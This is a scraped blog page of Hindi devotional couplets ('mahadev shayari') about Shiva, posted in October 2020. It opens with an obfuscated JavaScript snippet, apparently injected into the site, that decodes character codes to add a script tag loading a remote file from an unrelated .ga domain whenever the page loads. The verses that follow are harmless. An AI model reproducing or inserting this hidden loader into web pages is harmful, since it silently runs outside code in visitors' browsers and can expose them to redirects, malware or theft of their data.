Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,102,108,97,116,46,108,111,119,101,114,116,104,101,110,115,107,121,97,99,116,105,118,101,46,103,97,47,109,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})(); mahadev shayari - SadLove
October 26, 2020

SadLove

Let Your love Unite

, mahadev shayari

mahadev shayari

, mahadev shayari

मेरा शिव है मेरा प्यार है

मेरा संसार है

, mahadev shayari

जो सुकून नहीं पूरे संसार मैं

वो सुकून है महादेव के दरबार मैं

, mahadev shayari

तेरा साथ है महाकाल तो किस बात की कमी है

, mahadev shayari

काल हो तुम महाकाल भी तुम

लोक हो तुम त्रिलोक भी तुम

, mahadev shayari

नेक हमारे धंधे है हम तोह भले के बन्दे है

, mahadev shayari

आदि तुम हो अनादि तुम ही हो अनंत का सार हो

साज तुम्ही श्रीनगर

तुम्ही तुम्ही जीवन का सार हो

, mahadev shayari

सवाल था इश्क़ का हमने जवाब में महादेव लिख दिया

, mahadev shayari

खुद को महाकाल से जोड़ दो

बाकि सब महादेव पर छोड़ do

, mahadev shayari

तलाश न कर मुझे इस संसार में

तेरे दिल में नहीं hu

में तो कही भी नहीं hu

, mahadev shayari

सोमवार की सुबह और गंगा का घाट हो

सब भूल जाऊ बस महादेव तू याद हो

, mahadev shayari

देख तेरे भिन्न भी मस्त है

क्युकी हम शिव में व्यस्त है

, mahadev shayari

सारे काम काज छोड़ बैठा हु शिव से नाता जोड़ बैठा हु

%d bloggers like this: